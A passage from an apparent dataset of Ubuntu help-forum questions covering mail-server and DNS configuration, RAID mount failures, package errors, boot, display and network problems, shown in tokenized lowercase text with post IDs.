's not required to uncomment # those . these are exceptions to this though : no sections ( e.g . namespace { } ) # or plugin settings are added by default , they 're listed only as examples . # paths are also just examples with the real defaults being based on configure # options . the paths listed here are for configure -- prefix=/usr # -- sysconfdir=/etc -- localstatedir=/var # enable installed protocols ! include_try /usr/share/dovecot/protocols.d/*.protocol # a comma separated list of ips or hosts where to listen in for connections . # `` * '' listens in all ipv4 interfaces , `` : : '' listens in all ipv6 interfaces . # if you want to specify non-default ports or anything more complex , # edit conf.d/master.conf . # listen = * , : : # base directory where to store runtime data . # base_dir = /var/run/dovecot/ # name of this instance . used to prefix all dovecot processes in ps output . # instance_name = dovecot # greeting message for clients . # login_greeting = dovecot ready . # space separated list of trusted network ranges . connections from these # ips are allowed to override their ip addresses and ports ( for logging and # for authentication checks ) . disable_plaintext_auth is also ignored for # sepace separated list of login access check sockets ( e.g . tcpwrap ) # login_access_sockets = # show more verbose process titles ( in ps ) . currently shows user name and # ip address . useful for seeing who are actually using the imap processes # ( eg . shared mailboxes or if same uid is used for multiple accounts ) . # verbose_proctitle = no # should all processes be killed when dovecot master process shuts down . # setting this to `` no '' means that dovecot can be upgraded without # forcing existing client connections to close ( although that could also be # a problem if the upgrade is e.g . because of a security fix ) . # shutdown_clients = yes # if non-zero , run mail commands via this many connections to doveadm server , # instead of running them directly in the same process . # doveadm_worker_count = 0 # unix socket or host : port used for connecting to doveadm server # doveadm_socket_path = doveadm-server # space separated list of environment variables that are preserved on dovecot # startup and passed down to all of its child processes . you can also give # key=value pairs to always set specific settings . # import_environment = tz # # # # dictionary server settings # # # dictionary can be used to store key=value lists . this is used by several # plugins . the dictionary can be accessed either directly or though a # dictionary server . the following dict block maps dictionary names to uris # when the server is used . these can then be referenced using uris in format # `` proxy : : < name > '' . dict { # quota = mysql : /etc/dovecot/dovecot-dict-sql.conf.ext # expire = sqlite : /etc/dovecot/dovecot-dict-sql.conf.ext } # most of the actual configuration gets included below . the filenames are # first sorted by their ascii value and parsed in that order . the 00-prefixes # in filenames are intended to make it easier to understand the ordering . ! include conf.d/*.conf # a config file can also tried to be included without giving an error if # it 's not found : ! include_try local.conf protocols = imap pop3 # disable_plaintext_auth = no mail_location = mbox : ~/mail : inbox=/var/mail/ % u mail_location = maildir : ~/maildir [ /quote ] bind configuration forward zone [ quote ] ; ; bind data file for local loopback interface ; $ ttl 604800 @ in soa ns1.xyz.com . root.xyz.com . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns1.xyz.com . @ in a x.x.x.x ns1 in a x.x.x.x in mx 10 mail.xyz.com . www in cname ns1 mail in cname ns1 [ /quote ] reverse zone [ quote ] ; ; bind reverse data file for local loopback interface ; $ ttl 604800 @ in soa ns1.xyz.com . root.xyz.com . ( 1 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cache ttl ; @ in ns ns1.xyz.com . x.x.x.x.in-addr.arpa in ptr ns1.xyz.com . x.x.x.x.in-addr.arpa in ptr mail.xyz.com . [ /quote ] nslookup mail.xyz.com [ quote ] root @ ubuntu-server-xyz : /etc/bind # nslookup mail.xyz.com server : 8.8.8.8 address : 8.8.8.8 # 53 non-authoritative answer : mail.xyz canonical name = ns1.xyz . name : ns1.xyz.com address : x.x.x.x [ /quote ] dig mail.xyz.com ; < < > > dig 9.8.1-p1 < < > > mail.xyz.com ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 4345 ; ; flags : qr rd ra ; query : 1 , answer : 2 , authority : 0 , additional : 0 ; ; question section : ; mail.xyz.com . in a ; ; answer section : mail.xyz.com . 21599 in cname ns1.xyz.com . ns1.xyz.com . 21599 in a x.x.x.x ; ; query time : 67 msec ; ; server : 8.8.8.8 # 53 ( 8.8.8.8 ) ; ; when : fri may 9 15:34:11 2014 ; ; msg size rcvd : 70 test of squirrelmail squirrelmail configtest squirrelmail configtest this script will try to check some aspects of your squirrelmail configuration and point you to errors whereever it can find them . you need to go run conf.pl in the config/ directory first before you run this script . squirrelmail version : 1.4.22 config file version : 1.4.0 config file last modified : 08 may 2014 09:38:44 checking php configuration ... php version 5.3.10-1ubuntu3.11 ok. running as www-data ( 33 ) / www-data ( 33 ) display_errors : error_reporting : 22527 variables_order ok : gpcs . php extensions ok . dynamic loading is disabled . checking paths ... data dir ok. attachment dir ok. plugins ok . themes ok . default language ok. base url detected as : http : //mail.xyz.com/src ( location base autodetected ) checking outgoing mail service ... . smtp server ok ( 220 ubuntu-server-xyz esmtp postfix ( ubuntu ) ) checking imap service ... . imap server ready ( * ok [ capability imap4rev1 literal+ sasl-ir login-referrals id enable idle starttls auth=plain ] dovecot ready . ) capabilities : * capability imap4rev1 literal+ sasl-ir login-referrals id enable idle starttls auth=plain checking internationalization ( i18n ) settings ... gettext - gettext functions are available . on some systems you must have appropriate system locales compiled . mbstring - mbstring functions are available . recode - recode functions are unavailable . iconv - iconv functions are available . timezone - webmail users can change their time zone settings . checking database functions ... not using database functionality . congratulations , your squirrelmail setup looks fine to me ! please help me to resolve it ... ..mail goes in spam . and squirrel mail is not receiving mail .
463395	ca n't mount raid after upgrade	i just upgraded my box to 14.04 and on bootup i got a message , that my raid devices ca n't be mounted automatically so i chose to skip it and work through it after boot time . now booted up , a mount -a gives me : $ sudo mount -a [ sudo ] password for reg : mount : wrong fs type , bad option , bad superblock on /dev/md0 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so mount : wrong fs type , bad option , bad superblock on /dev/md1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so $ while my mdadm.conf looks like : $ cat /etc/mdadm/mdadm.conf # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # next line added by reg 09/01/2009 array /dev/md0 devices=/dev/sdb6 , /dev/sdc6 array /dev/md1 devices=/dev/sdb7 , /dev/sdc7 # array /dev/md2 devices=/dev/sdb8 , /dev/sdc8 # definitions of existing md arrays # this file was auto-generated on tue , 08 may 2012 18:26:22 -0700 # by mkconf $ id $ $ just quickly started gparted to check if all my dirves show up and fair enough , my partitions 6 & 7 show up just fine on drives sdb and sdc . also , seems like mdadm is running just fine : $ ps ax | grep mdadm 1945 ? ss 0:00 /sbin/mdadm -- monitor -- pid-file /run/mdadm/monitor.pid -- daemonise -- scan -- syslog 7869 pts/8 s+ 0:00 grep -- color=auto mdadm $ what could be my problem here , i do n't quite follow : $ dmesg | tail [ 1437.716819 ] ext4-fs ( md0 ) : bad geometry : block count 61034935 exceeds size of device ( 61034912 blocks ) [ 1437.717197 ] ext4-fs ( md1 ) : mounting ext3 file system using the ext4 subsystem [ 1437.717422 ] ext4-fs ( md1 ) : bad geometry : block count 59585077 exceeds size of device ( 59585056 blocks ) [ 3030.508560 ] init : nvidia-persistenced main process ( 21110 ) terminated with status 1 [ 3757.003367 ] current rate 16719823 is different from the runtime rate 48000 [ 3757.006356 ] current rate 10357448 is different from the runtime rate 48000 [ 3850.605129 ] ext4-fs ( md0 ) : mounting ext3 file system using the ext4 subsystem [ 3850.605299 ] ext4-fs ( md0 ) : bad geometry : block count 61034935 exceeds size of device ( 61034912 blocks ) [ 3850.605585 ] ext4-fs ( md1 ) : mounting ext3 file system using the ext4 subsystem [ 3850.605782 ] ext4-fs ( md1 ) : bad geometry : block count 59585077 exceeds size of device ( 59585056 blocks ) reg @ regdesktophome : ~/semios $ and syslog says nothing but mdadm : $ sudo mdadm -- detail -- scan mdadm : can not open /dev/md/127_0 : no such file or directory array /dev/md1 metadata=0.90 uuid=0abe503f:401d8d09 : cd707cc0 : bc3f8165 array /dev/md0 metadata=0.90 uuid=91e560f1:4e51d8eb : cd707cc0 : bc3f8165 $ and mdstat $ cat /proc/mdstat personalities : [ raid1 ] [ linear ] [ multipath ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdb6 [ 1 ] sdc6 [ 0 ] 244139648 blocks [ 2/2 ] [ uu ] md1 : active raid1 sdb7 [ 1 ] sdc7 [ 0 ] 238340224 blocks [ 2/2 ] [ uu ] md127 : active raid1 sdb3 [ 1 ] sdc3 [ 0 ] 390628416 blocks [ 2/2 ] [ uu ] unused devices : < none > $ and mdadm -- detail md0 : $ sudo mdadm -- detail /dev/md0 /dev/md0 : version : 0.90 creation time : tue sep 1 19:15:33 2009 raid level : raid1 array size : 244139648 ( 232.83 gib 250.00 gb ) used dev size : 244139648 ( 232.83 gib 250.00 gb ) raid devices : 2 total devices : 2 preferred minor : 0 persistence : superblock is persistent update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : 91e560f1:4e51d8eb : cd707cc0 : bc3f8165 events : 0.75007 number major minor raiddevice state 0 8 38 0 active sync /dev/sdc6 1 8 22 1 active sync /dev/sdb6\ mdadm -- detail md1 : reg @ regdesktophome : ~/semios $ sudo mdadm -- detail /dev/md1 /dev/md1 : version : 0.90 creation time : tue sep 8 21:19:15 2009 raid level : raid1 array size : 238340224 ( 227.30 gib 244.06 gb ) used dev size : 238340224 ( 227.30 gib 244.06 gb ) raid devices : 2 total devices : 2 preferred minor : 1 persistence : superblock is persistent update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 uuid : 0abe503f:401d8d09 : cd707cc0 : bc3f8165 events : 0.3973383 number major minor raiddevice state 0 8 39 0 active sync /dev/sdc7 1 8 23 1 active sync /dev/sdb7 $ mdadm -- examine sdb6 $ sudo mdadm -- examine /dev/sdb6 /dev/sdb6 : magic : a92b4efc version : 0.90.00 uuid : 91e560f1:4e51d8eb : cd707cc0 : bc3f8165 creation time : tue sep 1 19:15:33 2009 raid level : raid1 used dev size : 244139648 ( 232.83 gib 250.00 gb ) array size : 244139648 ( 232.83 gib 250.00 gb ) raid devices : 2 total devices : 2 preferred minor : 0 update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : bfa701ff - correct events : 75007 number major minor raiddevice state this 1 8 22 1 active sync /dev/sdb6 0 0 8 38 0 active sync /dev/sdc6 1 1 8 22 1 active sync /dev/sdb6 mdadm -- examine sdb7 reg @ regdesktophome : ~/semios $ sudo mdadm -- examine /dev/sdb7 /dev/sdb7 : magic : a92b4efc version : 0.90.00 uuid : 0abe503f:401d8d09 : cd707cc0 : bc3f8165 creation time : tue sep 8 21:19:15 2009 raid level : raid1 used dev size : 238340224 ( 227.30 gib 244.06 gb ) array size : 238340224 ( 227.30 gib 244.06 gb ) raid devices : 2 total devices : 2 preferred minor : 1 update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : 2a7376fd - correct events : 3973383 number major minor raiddevice state this 1 8 23 1 active sync /dev/sdb7 0 0 8 39 0 active sync /dev/sdc7 1 1 8 23 1 active sync /dev/sdb7 mdadm -- examine sdc6 reg @ regdesktophome : ~/semios $ sudo mdadm -- examine /dev/sdc6 /dev/sdc6 : magic : a92b4efc version : 0.90.00 uuid : 91e560f1:4e51d8eb : cd707cc0 : bc3f8165 creation time : tue sep 1 19:15:33 2009 raid level : raid1 used dev size : 244139648 ( 232.83 gib 250.00 gb ) array size : 244139648 ( 232.83 gib 250.00 gb ) raid devices : 2 total devices : 2 preferred minor : 0 update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : bfa7020d - correct events : 75007 number major minor raiddevice state this 0 8 38 0 active sync /dev/sdc6 0 0 8 38 0 active sync /dev/sdc6 1 1 8 22 1 active sync /dev/sdb6 mdadm -- examine sdc7 reg @ regdesktophome : ~/semios $ sudo mdadm -- examine /dev/sdc7 /dev/sdc7 : magic : a92b4efc version : 0.90.00 uuid : 0abe503f:401d8d09 : cd707cc0 : bc3f8165 creation time : tue sep 8 21:19:15 2009 raid level : raid1 used dev size : 238340224 ( 227.30 gib 244.06 gb ) array size : 238340224 ( 227.30 gib 244.06 gb ) raid devices : 2 total devices : 2 preferred minor : 1 update time : sun may 4 21:32:24 2014 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 checksum : 2a73770b - correct events : 3973383 number major minor raiddevice state this 0 8 39 0 active sync /dev/sdc7 0 0 8 39 0 active sync /dev/sdc7 1 1 8 23 1 active sync /dev/sdb7 $ parted says this about sdb : $ sudo parted /dev/sdb unit mib print free model : ata st31000528as ( scsi ) disk /dev/sdb : 953870mib sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 0.03mib 95370mib 95370mib primary ext4 boot 3 95370mib 476843mib 381473mib primary ext4 2 476843mib 953859mib 477016mib extended 6 476843mib 715261mib 238418mib logical ext3 7 715261mib 948015mib 232754mib logical ext3 5 948015mib 953859mib 5844mib logical linux-swap ( v1 ) 953859mib 953870mib 10.3mib free space and this about sdc : reg @ regdesktophome : ~/semios $ sudo parted /dev/sdc unit mib print free model : ata st31000528as ( scsi ) disk /dev/sdc : 953870mib sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 0.03mib 95370mib 95370mib primary ext4 boot 3 95370mib 476843mib 381473mib primary ext4 2 476843mib 953859mib 477016mib extended 6 476843mib 715261mib 238418mib logical ext3 7 715261mib 948015mib 232754mib logical ext3 5 948015mib 953859mib 5844mib logical linux-swap ( v1 ) 953859mib 953870mib 10.3mib free space $ so how do i get my array abck up and running ? i have some crucial data on these disks and i thought it was safwe with the raid 1 array ...
463396	`` failed to fetch liborbit2_2.14.19-0.2_amd64.deb '' when installing java	when i try to install openjdk-7-jdk , i get the following message : failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/o/orbit2/liborbit2_2.14.19-0.2_amd64.deb size mismatch e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how to fix it ?
463397	loop installation ( wubi stype )	i am attempting to install to a loop mounted disk using the partman-auto-loop recepie . however , i receive an error telling me that a root filesystem could not be defined . i basically stole the preseed.cfg file from wubi to start out : partitioning d-i partman-auto/disk string lidisk d-i partman-auto/method string loop d-i partman-auto-loop/partition string lipartition d-i partman-auto-loop/recipe string \ /kubuntu/disks/root.disk 3000 20000 20000 $ default_filesystem method { format } format { } use_filesystem { } $ default_filesystem { } mountpoint { / } . \ /kubuntu/disks/swap.disk 100 256 256 linux-swap method { swap } format { } . \ d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/filter_mounted boolean false d-i ubiquity/partman-skip-unmount boolean true booting in the ~following way insmod lvm set root= ( lvm/ ... ) set iso_path=/kubuntu/installdisk.iso export iso_path loopback loop /kubuntu/installdisk.iso configfile ( loop ) /boot/grub/loopback.cfg in the now open cd menu modify the kernel lines to start with ( loop ) since that is where they are linux ( loop ) /../vmlinuz debian-installer/custom-installation=/kubuntu/install initrd ( loop ) /../initrd the installation appears to start but stops when it tells me there is no root filesystem defined . the disk images are located on the host os in the root-lvm partition /kubuntu/disks/ { root , swap } .disk .
463399	stuck upgrade from 12.04 to 14.04	i 'm stuck on upgrade from 12.04 to 14.04 . it is stuck in libpython2.7 . it says `` glib-critical ... line 207 '' . any clues ? what should i do ? thanks .
463406	smaller screen after installing radeon driver from amd 's site	i do n't know if this is fully ubuntu related , anyway here 's the question : after i put in amd asus 280x and booted the screen size was normal , but after i downloaded and installed amd 's original 14.4 linux drivers amd-catalyst-14-4-linux-x86-x86-64.zip , restarted and booted again , it still was full hd but the screen size is like one inch on every side smaller/compressed . it 's like as if you open up an image and scale it to 90 % or so , you still see everything but you can see if there were text that the text is not in its original size ( kind of blurred ) . ( my lg flatron ips234 is connected via hdmi with the graphics card , ubuntu 14.04 64bit ) here is an image which shows what i mean ( note : the camera made this image extreme blurry , in reality it 's just a bit blurry ) :
463407	failed load after installing 14.04 with windows xp on dell inspierion 530	i am helping a friend and will not be able to get further information until end next week in the meantime i wish to update my own knowledge regards grub2 etc which is new to me if that is the required area . problem pc is dell inspiron 530 with windows xp loaded . ( he wants to keep xp for the moment if possible despite losing win support ) i had already used the dvd to successfully add ubuntu 14.04 to 12.04 on my own zoostorm . the install on the dell auto setup the new partition and at the end reported installation complete . when i restarted it loaded straight into win xp without offering ubuntu at all . any comments however critical would be most helpful .
463408	ubuntu 14.04 setting user password	i have 2 administrator accounts on my ubuntu 14.04 . i want both the accounts with startup password before logging in . but i only have 1 account with the startup password , which was created during the installation of ubuntu 14.04 . i tried to change the password again , but the problem persists . please help me .
463412	wi-fi speed issue with 14.04 lts	i have a strange issue with the wi-fi speed in ubuntu 14.04 . after a restart of the computer my wlan speeds range at 20-30 mbs , but after a while of usage ( and/or idle ) the speed drops to about 2-3 mbs . after disabling and re-enabling wi-fi , the speed is back in the 20-30 mbs range . i am measuring the speed with http : //www.bredbandskollen.se/ which is known to give reliable assessments of network speeds . i have tried some of the tips here : http : //itsfoss.com/speed-up-slow-wifi-connection-ubuntu/ but it makes no difference . my wireless adapter is asus pce-n15 wless pci-e 802.11n 300mbps . i get the following output when i run ifconfig , lspci and iwlist power . any ideas ? ... ~ $ sudo ifconfig wlan0 wlan0 link encap : ethernet hwaddr ac:22:0b:91:9d : d0 inet addr:192.168.1.197 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ae22 : bff : fe91:9dd0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:218256 errors:0 dropped:1 overruns:0 frame:0 tx packets:200633 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:149638799 ( 149.6 mb ) tx bytes:88264551 ( 88.2 mb ) ... ~ $ lspci 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0b ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8192ce pcie wireless network adapter ( rev 01 ) ... ~ $ iwlist power eth0 no power management information . lo no power management information . wlan0 current mode : off
463413	sslh and openvpn usage issue	on my server i am using openvpn , owncloud and web server . i recently install sslh for using owncloud with https . i install sslh successfuly and make the configurations . problem is i am try to start sslh service but i get this error : xx.xx.xx.xx : https : bind : address already in use . i now the problem but i ca n't fix it yet . if stop the openvpn services sslh work fine but after that i ca n't start openvpn service again ( without reboot ) . i try to change boot order ( change sxxsshl number and make it smaller than openvpn ' in /etc/rcx.d folders ) but it did n't work . so i am out of option and wait for help .
463414	is iluv usb audio adapter supported in linux ?	is iluv usb audio adapter supported in linux ? it 's a portable usb audio card that takes no more space and costs hardly more than an adapter .
463419	messed up viewports after locking/suspending my session	if i move some applications to specific viewports ( most of the time i move them by focusing and then ctrl+shift+alt+arrow ) and then lock/suspend my session ( ctrl+alt+l ) , all the windows will be back to viewport 1 after unlocking . note that i ticked the `` require my password when waking from suspend '' . i 'm encountering the issue since ubuntu 13.10 , and unfortunately the was n't resolved in 14.04 . how do i let the applications remain on the same viewport as they were after unlocking/resuming from suspend as they were before .
463421	ubuntu 14.04 getting ping : sendmsg : operation not permitted	the problem is out of my league apparently , ubuntu can not access any network but somehow my vms using virtual box are all able to access the internet . i have attempted to do the following changes but as you can this was not successful . i am very confused as to what is wrong on my box . any help appreciated . carl @ carl-latitude-e6410 : ~ $ sudo ip6tables -p input accept carl @ carl-latitude-e6410 : ~ $ sudo ip6tables -p output accept carl @ carl-latitude-e6410 : ~ $ sudo ip6tables -p forward accept carl @ carl-latitude-e6410 : ~ $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ^c -- - 8.8.8.8 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1008ms carl @ carl-latitude-e6410 : ~ $ sudo iptables -p input accept carl @ carl-latitude-e6410 : ~ $ sudo iptables -p output accept carl @ carl-latitude-e6410 : ~ $ sudo iptables -p forward accept carl @ carl-latitude-e6410 : ~ $ sudo service iptables restart iptables : unrecognized service carl @ carl-latitude-e6410 : ~ $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . ping : sendmsg : operation not permitted ping : sendmsg : operation not permitted ^c -- - 8.8.8.8 ping statistics -- - 2 packets transmitted , 0 received , 100 % packet loss , time 1008ms
463429	display resolution	i just installed ubuntu 14.04 lts on my very very old notebook ( for learning purposes ) . the installation was successful , but unfortunately i can not change my display resolution . it stucks at 800x600 . this makes it very hard to work . my notebook is a fujitsu siemens esprimo mobile v5535 . i used google , but i am a beginner in ubuntu/linux and did not understand anything . i even do not know the commands for the terminal in ubuntu , so thats why i wrote my problem here . hope i get some help ! thanks in anticipation .
463432	odesk app problem	i installed recently odesk application but i get this error everytime i launch it . then the icon looks like this : how can i fix this ?
463434	why is ubuntu one being discontuined ? replacements ?	why is ubuntu one being discontinued and any sugestions what replacement options play well with linux , mac , win & android ?
463435	how to make an admin app available to a standard account	i have some software installed in an administrative account which i would also like to make available to a standard account ~ picasa for instance.. do i have to duplicate the software by installing it again into the standard account , or can i change permissions somehow - to make access available . thanks
463436	can i upgrade from a 10.xx version of ubuntu up to 14.04 lts without making a cd or a usb installation ?	can i upgrade from a 10.xx version of ubuntu up to 14.04 lts without making a cd or a usb installation ? ! because i have no usb that i want to format right now . and i have no disk big enough to install ubuntu on . and my cd-rom does n't have dvd-rom
463437	can i set a default display arrangement for when i connect to a new screen ?	i would like to set a default display arrangement for when i connect my laptop to an unknown screen . my background here is that i mostly work at the university labs , which means i basically have a new display every time i start working . when i plug the vga into my laptop , it automatically switches into this mode : now , the vga socket of my laptop happens to be on the left side , so i always place the laptop to the right of the bigger screen . and since that is not going to change until i buy a new one , i would love to be able to make the default behaviour this : is there any way to do this ? maybe in the xorg.conf or such ? i am running purely on intel graphics at the moment since my hybrid nvidia chip is not worth the trouble .
463438	running kde on ubuntu release 14.04	doing a fresh install on a dell optiplex 745 atix1300 video card . os installs and boots into unity just fine . after installing kde ( first tried kde-full , then formatted , reinstalled os and did kde-plasma-desktop ) same thing - logon , get a nice kde background with a cursor and nothing else . terminal and terminal commands run fine . tried so far : [ compositing ] entry exec startkde in xinitrc running updates - system says software up to date reinstall plasma-desktop says already installed and latest version so no changes made if try startkde from terminal get $ display is not set or can not connect to the x server if try startx from terminal starts what looks like unity background with cursor and nothing else happens looking in different threads i see they all deal with this problem in releases 12 or 13 . so my questions are : has anyone tried it in 14.04 ? if yes what did you have to do ? i tried it in both 64-bit and 32-bit editions , plan to stick with 32-bit as 64-bit edition seems to drag a little on this pc in one thread i saw a couple of participants saying that in order for kde to function some certain fonts must be installed . was not able to find any further information on this , does anyone know about that ? thank you
463440	installed 14.04 on a non-pae ( pentium-m ) , but now i ca n't update ( `` this kernel does not support a non-pae cpu . '' )	here is what i 'm looking at . this is n't my computer . i repair pc 's and i had an end user with this low powered laptop running xp so i decided to let him try out lubuntu . the install went smoothly with the non-pae boot switch , but now i ca n't update anything . i 'd rather not have to format and start over since he 's spent time configuring his system . any tips would be appreciated . i tried sudo apt-get clean , sudo apt-get install -f , sudo apt-get update . no go . also his touchpad stopped working , the wireless stopped working , the keyboard works in firefox but not chrome , and in firefox the address bar sometimes turns black and gray for some reason . i was hoping the update would help address some of this stuff . here 's the message i get trying to update : get:1 http : //us.archive.ubuntu.com/ubuntu/ trusty-proposed/main linux-image-3.13.0-26-generic i386 3.13.0-26.48 [ 14.6 mb ] get:2 http : //us.archive.ubuntu.com/ubuntu/ trusty-updates/main linux-image-3.13.0-24-generic i386 3.13.0-24.47 [ 14.6 mb ] fetched 29.2 mb in 2min 19s ( 208 kb/s ) ( reading database ... 169286 files and directories currently installed . ) preparing to unpack ... /linux-image-3.13.0-26-generic_3.13.0-26.48_i386.deb ... this kernel does not support a non-pae cpu . dpkg : error processing archive /var/cache/apt/archives/linux-image-3.13.0-26-generic_3.13.0-26.48_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-26-generic /boot/vmlinuz-3.13.0-26-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-26-generic /boot/vmlinuz-3.13.0-26-generic preparing to unpack ... /linux-image-3.13.0-24-generic_3.13.0-24.47_i386.deb ... this kernel does not support a non-pae cpu . dpkg : error processing archive /var/cache/apt/archives/linux-image-3.13.0-24-generic_3.13.0-24.47_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.13.0-24-generic /boot/vmlinuz-3.13.0-24-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.13.0-26-generic_3.13.0-26.48_i386.deb /var/cache/apt/archives/linux-image-3.13.0-24-generic_3.13.0-24.47_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
463442	how do i install huawei e5372 usb dungle on 12.04	i just got a new usb modem huawei e5372 , can someone please put me through or point me to the right direction . thanks in advance
463444	postfix rcpt based filtering	i want to configure my postfix mail server in such a way that a mail sent to chairman @ example.com should go to admin @ example.com only admin can directly send mail to chairman @ example.com please help me to solve this isssue
463445	using kvm ( keyboard-video-mouse ) during installation	i am having the same problem described in this question . i 'm trying to set up a server using an iogear gcs62 kvm ( keyboard-video-mouse , not kernel-based virtual machine ) adapter so i can refer to the internet on another computer when needed but it seems the adapter is n't compatible with the installation process , or maybe with linux in general . it 's the keyboard that 's the problem . anyone have any experience using a kvm during installation ? ubuntu server 14.04compaq dc5750 sff tia , bruce hyatt
463447	installing 14.04	i have spent 2 days trying to install ubuntu 14.04 from a cd on my hp laptop which had vista running . i get chinese in the firefox home page which i ca n't alter . there are 2 chinese folders on the desktop . there are 2 chinese dropdown menus on the toolbar . i ca n't connect to the internet via my wireless network . i downloaded all the wireless drivers , and when trying to install i was told they were already installed , but i ca n't get them to run . i ca n't run my laptop on battery , even though it is fully charged ; when removing mains power the laptop instantly shuts down and can not be restarted unless mains is attached again . i can connect to the internet wired direct to my bt router . i ca n't even delete ubuntu , because the the instructions are too complicated . i have reinstalled , with the same results . p.s . it wo n't shut down using shutdown . i have to pull the mains plug .
463449	sagem mf-5482n printer on ubuntu 14.04	i got a multifunctional printer sagem mf-5482n . on their site there is a linux software for it but for ubuntu 9.10 but i am running ubuntu 14.10 x64 . how can i install it ? is the only way to install it to use windows ppd from windows drivers , or can i be able to do it with linux dedicated software ?
463450	ca n't get ubuntu 14.04 running on lenovo g 50-70	i 've been trying to install ubuntu 14.04 on a new lenovo g 50-70 . however upon installation on boot-up the system goes into the following error the system is running in low graphics mode . i 've tried the fixes mentioned on this page how to fix `` the system is running in low-graphics mode '' error ? sudo apt-get install fglrx but it relies on internet connectivity as in the command relies on the system being connected to the internet . this machine does not have a rj 45 lan socket and does n't seem to detect a wifi . i tried using the iphone as a hotspot and even that failed . any help to get ubuntu up and running would be appreciated .
463452	update manager frozen	i have 260 software updates to make . i choose install updates , it appears applying changes , but it just stays there ( after giving my password ) , with no evolution . any thoughts ? ( i 'm using wubi , 12.04 lts 32-bit )
463453	dell inspiron 1150 - ubuntu linux 14.04 lts trusty tahr	i have an old dell inspiron 1150 ... . celeron 2.60ghz ... . 1gb of memory 512mbddr pc2700 x2 purchased in 2004 . it was the family laptop for years . now it 's become the turbotax computer with no other real purpose . already copied needed files to an external hard drive . waiting for delivery of ubuntu : ubuntu linux 14.04 lts trusty tahr desktop 64 bit live dvd/install disc . will 14.04 work ? i want to do a single install . want xp wiped off the unit entirely . the dell is so larded-up with unnecessary stuff that i want a fresh start .
463455	get ubuntu to accessed via hostname and share home folder on samba	i have a nuc that runs xbmc . i would love to share all contents of home folder . [ or a folder inside home folder with complete public guest access and a hidden share for xbmc config folder only accessible via complete path ] i can not get the netbios to work . the network is statically configured . i can access via ip address but not via hostname . this also results for the share to now show up on my network places in macbook .
463457	how to find packages when updating ubuntu and creating standard source.list file	i just upgrade to ubuntu 14.04 lts , amd64 . i 'm trying to install some software and it says for ubuntu 13.10 and above , the following libraries need to be installed for 32-bit compatibility components : sudo apt-get install libgtk2.0-0 : i386 libxtst6 : i386 libpangox-1.0-0 : i386 \ libpangoxft-1.0-0 : i386 libidn11 : i386 libglu1-mesa : i386 \ libncurses5 : i386 libudev1 : i386 libusb-1.0 : i386 libusb-0.1 : i386 \ gtk2-engines-murrine : i386 i know when i had ubuntu 13.10 i was able to download these packages , but now that i updated , none of these packages can be found : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libgtk2.0-0 e : could n't find any package by regex 'libgtk2.0-0' how do i go about finding these packages in ubuntu 14.04 lts , amd64 ? why could i find them in 13.10 and they no longer exist in 14.04 ? did these things get renamed and moved around ? how do i find out and resolve this issue ? how do people resolve these issues when updating ubuntu ? thanks in advance . edit i get this error message when running commands suggested below : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libgtk2.0-0 e : could n't find any package by regex 'libgtk2.0-0' e : unable to locate package libxtst6 e : unable to locate package libpangox-1.0-0 e : could n't find any package by regex 'libpangox-1.0-0' e : unable to locate package libpangoxft-1.0-0 e : could n't find any package by regex 'libpangoxft-1.0-0' e : unable to locate package libidn11 e : unable to locate package libglu1-mesa e : unable to locate package libncurses5 e : unable to locate package libudev1 e : unable to locate package libusb-1.0 e : could 